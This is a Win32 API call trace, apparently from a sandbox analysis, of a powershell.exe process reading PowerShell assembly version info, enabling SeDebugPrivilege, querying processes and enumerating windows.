	[0408.159] GetVersionExW (in: lpVersionInformation=0x26db80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26db80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0408.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.578] GetVersionExW (in: lpVersionInformation=0x26d8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0408.578] SetErrorMode (uMode=0x1) returned 0x1
	[0408.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26da50 | out: lpFileInformation=0x26da50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0408.580] SetErrorMode (uMode=0x1) returned 0x1
	[0408.584] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dcc0 | out: lpdwHandle=0x26dcc0) returned 0x94c
	[0408.585] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d772d8 | out: lpData=0x2d772d8) returned 1
	[0408.588] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dc38, puLen=0x26dc30 | out: lplpBuffer=0x26dc38*=0x2d77374, puLen=0x26dc30) returned 1
	[0408.590] lstrlenW (lpString="䅁") returned 1
	[0408.599] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x2d77450, puLen=0x26dba0) returned 1
	[0408.599] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0408.602] CoTaskMemAlloc (cb=0x2e) returned 0xc90a0
	[0408.602] lstrcpyW (in: lpString1=0xc90a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0408.603] CoTaskMemFree (pv=0xc90a0) 
	[0408.603] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x2d774a4, puLen=0x26dba0) returned 1
	[0408.603] lstrlenW (lpString="System.Management.Automation") returned 28
	[0408.603] CoTaskMemAlloc (cb=0x3c) returned 0x99860
	[0408.603] lstrcpyW (in: lpString1=0x99860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0408.603] CoTaskMemFree (pv=0x99860) 
	[0408.603] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x2d77500, puLen=0x26dba0) returned 1
	[0408.603] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0408.603] CoTaskMemAlloc (cb=0x20) returned 0x167430
	[0408.603] lstrcpyW (in: lpString1=0x167430, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0408.603] CoTaskMemFree (pv=0x167430) 
	[0408.603] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x2d77540, puLen=0x26dba0) returned 1
	[0408.603] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0408.603] CoTaskMemAlloc (cb=0x44) returned 0x99860
	[0408.603] lstrcpyW (in: lpString1=0x99860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0408.603] CoTaskMemFree (pv=0x99860) 
	[0408.603] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x2d775a8, puLen=0x26dba0) returned 1
	[0408.603] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0408.603] CoTaskMemAlloc (cb=0x76) returned 0x104ad0
	[0408.603] lstrcpyW (in: lpString1=0x104ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0408.603] CoTaskMemFree (pv=0x104ad0) 
	[0408.603] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x2d77644, puLen=0x26dba0) returned 1
	[0408.603] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0408.603] CoTaskMemAlloc (cb=0x44) returned 0x99860
	[0408.603] lstrcpyW (in: lpString1=0x99860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0408.604] CoTaskMemFree (pv=0x99860) 
	[0408.604] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x2d776a8, puLen=0x26dba0) returned 1
	[0408.604] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0408.604] CoTaskMemAlloc (cb=0x58) returned 0xb5120
	[0408.604] lstrcpyW (in: lpString1=0xb5120, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0408.604] CoTaskMemFree (pv=0xb5120) 
	[0408.604] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x2d77724, puLen=0x26dba0) returned 1
	[0408.604] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0408.604] CoTaskMemAlloc (cb=0x20) returned 0x167430
	[0408.604] lstrcpyW (in: lpString1=0x167430, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0408.604] CoTaskMemFree (pv=0x167430) 
	[0408.604] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x2d773cc, puLen=0x26dba0) returned 1
	[0408.604] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0408.604] CoTaskMemAlloc (cb=0x66) returned 0xcb990
	[0408.604] lstrcpyW (in: lpString1=0xcb990, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0408.604] CoTaskMemFree (pv=0xcb990) 
	[0408.604] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x0, puLen=0x26dba0) returned 0
	[0408.604] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x0, puLen=0x26dba0) returned 0
	[0408.604] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dba8, puLen=0x26dba0 | out: lplpBuffer=0x26dba8*=0x0, puLen=0x26dba0) returned 0
	[0408.604] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x2d77374, puLen=0x26db70) returned 1
	[0408.605] CoTaskMemAlloc (cb=0x204) returned 0xfc970
	[0408.605] VerLanguageNameW (in: wLang=0x0, szLang=0xfc970, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0408.606] CoTaskMemFree (pv=0xfc970) 
	[0408.607] VerQueryValueW (in: pBlock=0x2d772d8, lpSubBlock="\\", lplpBuffer=0x26dbc8, puLen=0x26dbc0 | out: lplpBuffer=0x26dbc8*=0x2d77300, puLen=0x26dbc0) returned 1
	[0408.612] GetCurrentProcessId () returned 0x2b0
	[0409.053] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26caf0 | out: lpLuid=0x26caf0*(LowPart=0x14, HighPart=0)) returned 1
	[0409.057] GetCurrentProcess () returned 0xffffffffffffffff
	[0409.057] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26cb10 | out: TokenHandle=0x26cb10*=0x2e4) returned 1
	[0409.058] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2d7ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0409.060] CloseHandle (hObject=0x2e4) returned 1
	[0409.064] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2b0) returned 0x2e4
	[0409.385] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2d7abb8, cb=0x200, lpcbNeeded=0x26db28 | out: lphModule=0x2d7abb8, lpcbNeeded=0x26db28) returned 1
	[0409.387] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2d7ae28, cb=0x18 | out: lpmodinfo=0x2d7ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0409.388] CoTaskMemAlloc (cb=0x804) returned 0x16f670
	[0409.388] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x16f670, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0409.388] CoTaskMemFree (pv=0x16f670) 
	[0409.388] CoTaskMemAlloc (cb=0x804) returned 0x16f670
	[0409.388] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x16f670, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0409.389] CoTaskMemFree (pv=0x16f670) 
	[0409.389] CloseHandle (hObject=0x2e4) returned 1
	[0409.396] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x2b0) returned 0x2e4
	[0409.397] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x26dc58 | out: lpExitCode=0x26dc58*=0x103) returned 1
	[0409.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d7b088, Length=0x20000, ResultLength=0x26dc20 | out: SystemInformation=0x12d7b088, ResultLength=0x26dc20*=0x248d8) returned 0xc0000004
	[0409.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d9b0b8, Length=0x270d8, ResultLength=0x26dc20 | out: SystemInformation=0x12d9b0b8, ResultLength=0x26dc20*=0x248d8) returned 0x0
	[0409.417] EnumWindows (lpEnumFunc=0x2b066ac, lParam=0x0) returned 1
	[0410.890] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.890] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x558
	[0410.890] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.890] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.890] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.890] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x538
	[0410.890] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.890] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x778
	[0410.890] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x778
	[0410.891] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.891] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.891] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.891] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.891] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.891] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.891] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.891] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.920] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x460
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xdb0
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1398
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1358
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1370
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1340
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x130c
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x12c0
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x12e4
	[0410.921] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1270
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1298
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x120c
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x122c
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x11c4
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x11b0
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1188
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1148
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1160
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x10fc
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xe34
	[0410.922] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xea4
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x514
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xe48
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xbc8
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xdf8
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x318
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xcac
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x8bc
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xf9c
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xf48
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xe40
	[0410.923] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xecc
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xeb8
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xe80
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xe98
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xe60
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xee4
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xf00
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xdf0
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xe1c
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xdd0
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xd94
	[0410.924] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xd74
	[0410.925] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xd00
	[0410.925] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xcd8
	[0410.925] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xc84
	[0410.925] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xca4
	[0410.925] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xc64
	[0410.925] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xc24
	[0410.925] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb84
	[0410.925] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xbac
	[0410.925] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x384
	[0410.926] GetWindow (hWnd=0x102f8, uCmd=0x4) returned 0x0
	[0410.927] IsWindowVisible (hWnd=0x102f8) returned 0
	[0410.927] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xab8
	[0410.927] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x33c
	[0410.927] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa44
	[0410.927] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa64
	[0410.927] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x8a8
	[0410.927] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xaf0
	[0410.927] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x88c
	[0410.927] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb04
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x910
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x230
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xac0
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xab4
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xaac
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x3d0
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x978
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa7c
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x59c
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa88
	[0410.928] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa6c
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa68
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x9f8
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa04
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x924
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x8dc
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x7dc
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x768
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x764
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x820
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x810
	[0410.929] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x794
	[0410.930] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x83c
	[0410.930] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x7ac
	[0410.930] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb44
	[0410.930] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb5c
	[0410.930] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x838
